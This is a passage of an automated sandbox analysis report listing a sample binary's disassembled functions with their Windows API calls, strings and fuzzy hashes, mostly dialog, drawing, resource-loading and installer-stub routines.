                                              • MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                              • CreateCompatibleDC.GDI32(?), ref: 0040222B
                                              • CreateCompatibleDC.GDI32(?), ref: 00402232
                                              • SelectObject.GDI32(00000000,?), ref: 00402240
                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                              • SelectObject.GDI32(00000000,00000000), ref: 00402256
                                              • SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                              • SelectObject.GDI32(00000000,?), ref: 00402293
                                              • SelectObject.GDI32(00000000,?), ref: 00402299
                                              • DeleteDC.GDI32(00000000), ref: 004022A2
                                              • DeleteDC.GDI32(00000000), ref: 004022A5
                                              • ReleaseDC.USER32(00000000,?), ref: 004022AC
                                              • ReleaseDC.USER32(00000000,?), ref: 004022BB
                                              • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004022C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                              • String ID:
                                              • API String ID: 3462224810-0
                                              • Opcode ID: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                              • Instruction ID: 3b0073103a1e3377af01ca77c53c0656b208625dbf3d379900f4631a354f9c66
                                              • Opcode Fuzzy Hash: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                              • Instruction Fuzzy Hash: DB314A76D01208BFDF115FE19D48EEF7F79EB48760F108066FA04B61A0C6794A60EB66
                                              APIs
                                              • GetClassNameA.USER32(?,?,00000040), ref: 004022E5
                                              • lstrcmpiA.KERNEL32(?,STATIC), ref: 004022FC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040230F
                                              • GetMenu.USER32(?), ref: 00402324
                                                • Part of subcall function 004020BF: GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                • Part of subcall function 004020BF: SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                • Part of subcall function 004020BF: LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                • Part of subcall function 004020BF: LockResource.KERNEL32(00000000), ref: 00402121
                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402356
                                              • memcpy.MSVCRT ref: 00402363
                                              • CoInitialize.OLE32(00000000), ref: 0040236C
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402378
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C434,?), ref: 0040239D
                                              • GlobalFree.KERNEL32(00000000), ref: 004023AD
                                                • Part of subcall function 004021A8: GetWindowDC.USER32(00000000), ref: 004021B4
                                                • Part of subcall function 004021A8: GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                • Part of subcall function 004021A8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                • Part of subcall function 004021A8: GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 00402232
                                                • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402240
                                                • Part of subcall function 004021A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                • Part of subcall function 004021A8: SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                • Part of subcall function 004021A8: SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                • Part of subcall function 004021A8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                • Part of subcall function 004021A8: GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402293
                                                • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402299
                                                • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A2
                                                • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A5
                                                • Part of subcall function 004021A8: ReleaseDC.USER32(00000000,?), ref: 004022AC
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 004023DF
                                              • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004023F3
                                              • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00402405
                                              • GlobalFree.KERNEL32(00000000), ref: 0040241A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                              • String ID: IMAGES$STATIC
                                              • API String ID: 4202116410-1168396491
                                              • Opcode ID: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                              • Instruction ID: 12319829fe5b29bb351e3d23e86017266b1b8e93f03e65421de7465a1357d20e
                                              • Opcode Fuzzy Hash: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                              • Instruction Fuzzy Hash: 54419A31901218BFCB129FA1CC4CDEEBFB9FF09715B008076F905A62A0D7798A51DB69
                                              APIs
                                              • GetDlgItem.USER32(?,000004B3), ref: 00407A80
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00407A85
                                              • GetDlgItem.USER32(?,000004B4), ref: 00407ABC
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00407AC1
                                              • GetSystemMetrics.USER32(00000010), ref: 00407B43
                                              • GetSystemMetrics.USER32(00000011), ref: 00407B49
                                              • GetSystemMetrics.USER32(00000008), ref: 00407B50
                                              • GetSystemMetrics.USER32(00000007), ref: 00407B57
                                              • GetParent.USER32(?), ref: 00407B7B
                                              • GetClientRect.USER32(00000000,?), ref: 00407B8D
                                              • ClientToScreen.USER32(?,?), ref: 00407BA0
                                              • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407C06
                                              • GetClientRect.USER32(?,?), ref: 00407CA0
                                                • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A47
                                                • Part of subcall function 00407A29: SetWindowPos.USER32(00000000), ref: 00407A4E
                                              • ClientToScreen.USER32(?,?), ref: 00407BA9
                                                • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                              • GetSystemMetrics.USER32(00000008), ref: 00407D25
                                              • GetSystemMetrics.USER32(00000007), ref: 00407D2C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                              • String ID:
                                              • API String ID: 747815384-0
                                              • Opcode ID: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                              • Instruction ID: 68cc850d19f91a6f8b6e213b01393e3a0b6efc74fec8c50de4b66a5980513343
                                              • Opcode Fuzzy Hash: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                              • Instruction Fuzzy Hash: 30A13870E04209AFDB14DFBDCD85AAEBBF9EF48704F14452AE605F2281D678F9018B65
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040377F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403787
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004039AD
                                                • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT ref: 00402996
                                                • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT ref: 0040299D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004039DA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: SetEnvironment${\rtf
                                              • API String ID: 613200358-318139784
                                              • Opcode ID: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                              • Instruction ID: 401acfcb82d7e6738f93d8480f5cee0d093a2887585a601c22b507f4e5910529
                                              • Opcode Fuzzy Hash: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                              • Instruction Fuzzy Hash: B991C372900108ABDF11AFD5D941AEEBBB8AF14309F2480BBE841772D2D7785B06DB59
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                              • String ID: pA
                                              • API String ID: 801014965-794713698
                                              • Opcode ID: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                              • Instruction ID: 5929b0b6314edc43fbf3f3d2a0fc95e577a76ca797df3ab901b2fe2a182a5e0d
                                              • Opcode Fuzzy Hash: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                              • Instruction Fuzzy Hash: 1141ADB2D41344BFDB22CFA5DC55AEABBB9FB09710F20012BE841A3291D7785D81CB59
                                              APIs
                                              • GetParent.USER32(?), ref: 00407F94
                                              • GetWindowLongW.USER32(00000000), ref: 00407F9B
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00407FB1
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00407FCE
                                              • GetSystemMetrics.USER32(00000031), ref: 00407FE0
                                              • GetSystemMetrics.USER32(00000032), ref: 00407FE7
                                              • GetWindowDC.USER32(?), ref: 00407FF9
                                              • GetWindowRect.USER32(?,?), ref: 00408006
                                              • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 0040803A
                                              • ReleaseDC.USER32(?,00000000), ref: 00408042
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                              • String ID:
                                              • API String ID: 2586545124-0
                                              • Opcode ID: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                              • Instruction ID: 8ffa6a621c4839b38abe7fa2179ce9be6ee40ef55f84cce8d9fec75f1bbbc175
                                              • Opcode Fuzzy Hash: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                              • Instruction Fuzzy Hash: 8D214F7650021ABFCB019FB8DD48EEF3B69FB08351F004525FA11E2291CB35D920CB65
                                              APIs
                                                • Part of subcall function 004091A7: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                • Part of subcall function 004091A7: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                • Part of subcall function 004091A7: GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                • Part of subcall function 004091A7: SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                              • GetDlgItem.USER32(?,000004B6), ref: 004094A8
                                              • DestroyWindow.USER32(00000000), ref: 004094AB
                                              • CreateWindowExA.USER32(00000200,Edit,0041A840,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 004094E1
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004094F1
                                              • GetDlgItem.USER32(?,000004B6), ref: 004094FE
                                              • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 00409508
                                              • GetDlgItem.USER32(?,000004B6), ref: 00409512
                                              • SetFocus.USER32(00000000), ref: 00409515
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
                                              • String ID: Edit
                                              • API String ID: 2563414232-554135844
                                              • Opcode ID: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                              • Instruction ID: 4d71b540c7600c41684bbba3335aa98688d5166c257b7e93b864b054f1ea387c
                                              • Opcode Fuzzy Hash: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                              • Instruction Fuzzy Hash: DA116A71A00204BFEB11ABE5DD49FAFBBBCEF48B00F104429B201F61A1C675AD50876D
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$wsprintf
                                              • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                              • API String ID: 2704270482-695273242
                                              • Opcode ID: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                              • Instruction ID: 886d926ed7ba0351d4e9ba57da7cb0629939e873fb03075975f52044c447bd08
                                              • Opcode Fuzzy Hash: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                              • Instruction Fuzzy Hash: 15218F71A005187BDB05EAA59C86EFE73ADAB48704F14402EF504E31D1CB7DAA068799
                                              APIs
                                              • GetDlgItem.USER32(?,000004B3), ref: 0040779F
                                              • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077B2
                                              • GetDlgItem.USER32(?,000004B4), ref: 004077BC
                                              • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077C4
                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004077D4
                                              • GetDlgItem.USER32(?,?), ref: 004077DD
                                              • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004077E5
                                              • GetDlgItem.USER32(?,?), ref: 004077EE
                                              • SetFocus.USER32(00000000,?,?,00000000,00408726,000004B3,00000000,?,000004B3), ref: 004077F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ItemMessageSend$Focus
                                              • String ID:
                                              • API String ID: 3946207451-0
                                              • Opcode ID: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                              • Instruction ID: d34367ada3e0903658dac9af1ca1aef10e4e5856eabac84c2cebdb26553fe681
                                              • Opcode Fuzzy Hash: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                              • Instruction Fuzzy Hash: A4F04F712403087BEA216B61DD86F9BBB5EDF80B54F018425F354661F0CBF7AC209A29
                                              APIs
                                              • memcpy.MSVCRT ref: 00407E20
                                              • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00407E3F
                                              • GetDC.USER32(00000000), ref: 00407E4A
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407E56
                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407E65
                                              • ReleaseDC.USER32(00000000,?), ref: 00407E73
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00407E9B
                                              • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007643), ref: 00407ED0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                              • String ID:
                                              • API String ID: 2693764856-0
                                              • Opcode ID: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                              • Instruction ID: 8154b001b0011d5121478cb58b91efa441906eea3886e432abe560883a3f5ac4
                                              • Opcode Fuzzy Hash: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                              • Instruction Fuzzy Hash: 8421C375941318BFD7215BA1DD48EEB7B7CFF04301F0040B6FA09A2291D7744E948B6A
                                              APIs
                                              • GetDC.USER32(?), ref: 0040797F
                                              • GetSystemMetrics.USER32(0000000B), ref: 0040799B
                                              • GetSystemMetrics.USER32(0000003D), ref: 004079A4
                                              • GetSystemMetrics.USER32(0000003E), ref: 004079AC
                                              • SelectObject.GDI32(?,?), ref: 004079C9
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004079E4
                                              • SelectObject.GDI32(?,?), ref: 00407A0A
                                              • ReleaseDC.USER32(?,?), ref: 00407A19
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                              • String ID:
                                              • API String ID: 2466489532-0
                                              • Opcode ID: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                              • Instruction ID: 872bb3bd96abf1d963658246664a9f9dec04eac668a7313924c28ae5c7f0044f
                                              • Opcode Fuzzy Hash: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                              • Instruction Fuzzy Hash: FF216871901209AFCB01CF69DD44A9EBFF4FF08360F10C46AE519A72A0D335AA50DF41
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040895B
                                              • GetDlgItem.USER32(?,000004B8), ref: 00408979
                                              • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0040898B
                                              • wsprintfW.USER32 ref: 004089A9
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408A41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                              • String ID: %d%%
                                              • API String ID: 3753976982-1518462796
                                              • Opcode ID: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                              • Instruction ID: dc12f65f6354bcef20b20b64e73197b6a82627a21fa16bd919092f53849079ab
                                              • Opcode Fuzzy Hash: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                              • Instruction Fuzzy Hash: C531B371500208BFCB11AF51DD45EEA7BB9FF48304F10802EF986B62E1DB79A910CB59
                                              APIs
                                              • EndDialog.USER32(?,00000000), ref: 00408B52
                                              • KillTimer.USER32(?,00000001), ref: 00408B63
                                              • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408B8D
                                              • SuspendThread.KERNEL32(00000290), ref: 00408BA6
                                              • ResumeThread.KERNEL32(00000290), ref: 00408BC3
                                              • EndDialog.USER32(?,00000000), ref: 00408BE5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: DialogThreadTimer$KillResumeSuspend
                                              • String ID:
                                              • API String ID: 4151135813-0
                                              • Opcode ID: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                              • Instruction ID: 672def9565bfc40134271a6b6781851c3b106654d45cfef20a52af227c3b9f34
                                              • Opcode Fuzzy Hash: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                              • Instruction Fuzzy Hash: 101191B4202608EFE7215F52EE85EA7777CFB44745700843EF986A66A1CF396C10DA1D
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%T/$%%T\
                                              • API String ID: 613200358-2679640699
                                              • Opcode ID: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                              • Instruction ID: df8026740f1f86ca471eb2ea0e41fa98444a64685e80cf153ceacd7fb444c2e9
                                              • Opcode Fuzzy Hash: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                              • Instruction Fuzzy Hash: D411C97190010AAACF05FFA2D856CEDBB78AF14708F10846AB551760E2DF789B95CB48
                                              APIs
                                              Strings
                                              Memory Dump Source
